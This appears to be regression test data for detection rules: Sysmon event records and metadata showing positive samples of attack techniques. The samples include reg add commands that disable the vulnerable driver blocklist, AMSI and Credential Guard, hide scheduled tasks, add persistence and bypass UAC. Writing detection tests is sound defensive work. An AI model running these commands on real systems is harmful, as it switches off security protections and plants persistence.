"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "\"C:\\WINDOWS\\system32\\reg.exe\" add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v \"Common Startup\" /t REG_SZ /d C:\\Test\\calc.exe /f",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-70FA-694F-AED1-150000000000",
"LogonId": "0x15d1ae",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0",
"ParentProcessGuid": "0197231E-7211-694F-D001-000000000C00",
"ParentProcessId": 9524,
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"ParentCommandLine": "powershell -ep bypass",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml
================================================
id: 60dc10cf-d9d5-4e64-897f-90b9074def8f
description: N/A
date: 2026-01-05
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818
title: User Shell Folders Registry Modification via CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/8f3ab69a-aa22-4943-aa58-e0a52fdf6818.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-23T02:16:46.810517Z"
}
},
"EventRecordID": 90849,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3320,
"ThreadID": 4216
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-23 02:16:46.792",
"ProcessGuid": "0197231E-FB8E-6949-2610-000000000D00",
"ProcessId": 25368,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 00000000 /f",
"CurrentDirectory": "C:\\Windows\\System32\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-5032-6940-AAE2-070000000000",
"LogonId": "0x7e2aa",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0",
"ParentProcessGuid": "0197231E-FB8C-6949-2310-000000000D00",
"ParentProcessId": 22176,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/info.yml
================================================
id: eca9f987-800a-4b32-92ec-2d50a0a120a0
description: N/A
date: 2025-12-23
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 22154f0e-5132-4a54-aa78-cc62f6def531
title: Vulnerable Driver Blocklist Registry Tampering Via CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering/22154f0e-5132-4a54-aa78-cc62f6def531.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T08:12:45.186674Z"
}
},
"EventRecordID": 733879,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 08:12:45.183",
"ProcessGuid": "0197231E-07FD-6928-2A0C-000000000D00",
"ProcessId": 3532,
"Image": "C:\\Windows\\System32\\WerFaultSecure.exe",
"FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)",
"Description": "Windows Fault Reporting",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "WerFaultSecure.exe",
"CommandLine": "C:\\Windows\\System32\\WerFaultSecure.exe /h /pid 3472 /tid 3476 /encfile 304 /cancel 364 /type 268310",
"CurrentDirectory": "C:\\WINDOWS",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-B736-6923-B25C-3B0000000000",
"LogonId": "0x3b5cb2",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "SHA1=9521BDCD891789724786BDCB9C9468A06818EDDC,MD5=C5A2014C3BC84EDCEEF5185AEA3BB5E0,SHA256=1C60BA5771201F7AEE44DCA30CBCBF78F6E3C39F30AD0A5C6C7BC8137A475EAA,IMPHASH=79E7A5E4F18B29329345D2098E1B95EB",
"ParentProcessGuid": "0197231E-07FD-6928-290C-000000000D00",
"ParentProcessId": 9388,
"ParentImage": "C:\\Users\\xodih\\Downloads\\EDRFreeze-gnu.exe",
"ParentCommandLine": "EDRFreeze-gnu.exe 3472 10000",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/info.yml
================================================
id: 68010a5c-f8bf-4a2c-8cd0-038d4009805e
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2
title: PPL Tampering Via WerFaultSecure
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_werfaultsecure_abuse/1f0b4cac-9c81-41f4-95d0-8475ff46b3e2.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 12,
"Version": 2,
"Level": 4,
"Task": 12,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-26T19:24:05.918776Z"
}
},
"EventRecordID": 18298,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3484,
"ThreadID": 3424
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "DeleteValue",
"UtcTime": "2025-12-26 19:24:05.918",
"ProcessGuid": "0197231E-E0D5-694E-3803-000000000A00",
"ProcessId": 11088,
"Image": "C:\\WINDOWS\\system32\\reg.exe",
"TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\RequirePlatformSecurityFeatures",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/info.yml
================================================
id: 2e3725ae-2eaa-48a2-9d9b-4a7d55a75974
description: N/A
date: 2025-12-26
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: d645ef86-2396-48a1-a2b6-b629ca3f57ff
title: Windows Credential Guard Related Registry Value Deleted - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_delete/registry_delete_disable_credential_guard/d645ef86-2396-48a1-a2b6-b629ca3f57ff.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 12,
"Version": 2,
"Level": 4,
"Task": 12,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T00:11:12.880834Z"
}
},
"EventRecordID": 16786799,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "DeleteKey",
"UtcTime": "2025-10-26 00:11:12.865",
"ProcessGuid": "5AA13A44-6720-68FD-3E3F-000000004002",
"ProcessId": 6016,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml
================================================
id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 41d1058a-aea7-4952-9293-29eaaf516465
title: Removal Of AMSI Provider Registry Keys
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 12,
"Version": 2,
"Level": 4,
"Task": 12,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:56:57.832430Z"
}
},
"EventRecordID": 111828,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "DeleteKey",
"UtcTime": "2025-10-24 23:56:57.828",
"ProcessGuid": "5AA13A44-1246-68FC-781E-000000004002",
"ProcessId": 9880,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/info.yml
================================================
id: 3c0a5ddd-6241-4b52-9718-b12920e082ef
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55
title: RunMRU Registry Key Deletion - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 12,
"Version": 2,
"Level": 4,
"Task": 12,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T00:01:59.334619Z"
}
},
"EventRecordID": 156421,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "DeleteValue",
"UtcTime": "2025-10-25 00:01:59.330",
"ProcessGuid": "5AA13A44-1377-68FC-A61E-000000004002",
"ProcessId": 5160,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\Index",
"User": "NT AUTHORITY\\SYSTEM"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml
================================================
id: f3670cef-9f21-4a86-901b-c28c285f3b52
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec
title: Removal Of Index Value to Hide Schedule Task - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 12,
"Version": 2,
"Level": 4,
"Task": 12,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T00:01:54.872810Z"
}
},
"EventRecordID": 155709,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "DeleteValue",
"UtcTime": "2025-10-25 00:01:54.861",
"ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002",
"ProcessId": 7008,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD",
"User": "NT AUTHORITY\\SYSTEM"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml
================================================
id: b796fd1e-a03a-4db8-a072-c597b6e0da1b
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: acd74772-5f88-45c7-956b-6a7b36c294d2
title: Removal Of SD Value to Hide Schedule Task - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2020-12-18T17:56:07.017817Z"
}
},
"EventRecordID": 596571,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3552,
"ThreadID": 5004
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "MSEDGEWIN10",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "Hidden Local Account Created",
"EventType": "SetValue",
"UtcTime": "2020-12-18 17:56:07.015",
"ProcessGuid": "747F3D96-68DD-5FDD-0000-00101B660000",
"ProcessId": 648,
"Image": "C:\\Windows\\system32\\lsass.exe",
"TargetObject": "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)",
"Details": "Binary Data"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml
================================================
id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a
description: N/A
date: 2025-10-31
author: SigmaHQ Team
rule_metadata:
- id: 460479f3-80b7-42da-9c43-2cc1d54dbccd
title: Creation of a Local Hidden User Account by Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:28:03.064387Z"
}
},
"EventRecordID": 27517409,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:28:03.060",
"ProcessGuid": "5AA13A44-5A23-68FE-2155-000000004002",
"ProcessId": 4400,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\\(Default)",
"Details": "Service",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml
================================================
id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 1547e27c-3974-43e2-a7d7-7f484fb928ec
title: Registry Persistence via Service in Safe Mode
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:33:36.133400Z"
}
},
"EventRecordID": 27619790,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:33:36.131",
"ProcessGuid": "5AA13A44-5B70-68FE-4655-000000004002",
"ProcessId": 8024,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Print\\Monitors\\AtomicRedTeam\\Driver",
"Details": "C:\\AtomicRedTeam\\atomics\\T1547.010\\bin\\PortMonitor.dll",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/info.yml
================================================
id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e
title: Add Port Monitor Persistence in Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:36:04.950926Z"
}
},
"EventRecordID": 27665830,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:36:04.941",
"ProcessGuid": "5AA13A44-5C04-68FE-5855-000000004002",
"ProcessId": 10080,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp",
"Details": "DWORD (0x00000001)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml
================================================
id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b
title: Allow RDP Remote Assistance Feature
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-25T10:58:31.890479Z"
}
},
"EventRecordID": 16031,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3208,
"ThreadID": 1724
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-12-25 10:58:31.888",
"ProcessGuid": "0197231E-EC48-694C-AA0C-000000000800",
"ProcessId": 12456,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKU\\S-1-5-21-2555720767-1205513275-3893774561-1001\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable",
"Details": "DWORD (0x00000000)",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml
================================================
id: a02685df-b4dd-4f5b-b120-9127e1662022
description: N/A
date: 2025-12-25
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: aa37cbb0-da36-42cb-a90f-fdf216fc7467
title: AMSI Disabled via Registry Modification
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/aa37cbb0-da36-42cb-a90f-fdf216fc7467.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T17:41:48.911849Z"
}
},
"EventRecordID": 27772045,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 17:41:48.898",
"ProcessGuid": "5AA13A44-5D5B-68FE-7B55-000000004002",
"ProcessId": 420,
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\Folder\\shell\\open\\command\\DelegateExecute",
"Details": "(Empty)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml
================================================
id: 7fce1d05-2297-48a4-a670-f28745819c8a
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 46dd5308-4572-4d12-aa43-8938f0184d4f
title: Bypass UAC Using DelegateExecute
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/674202d0-b22a-4af4-ae5f-2eda1f3da1af.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
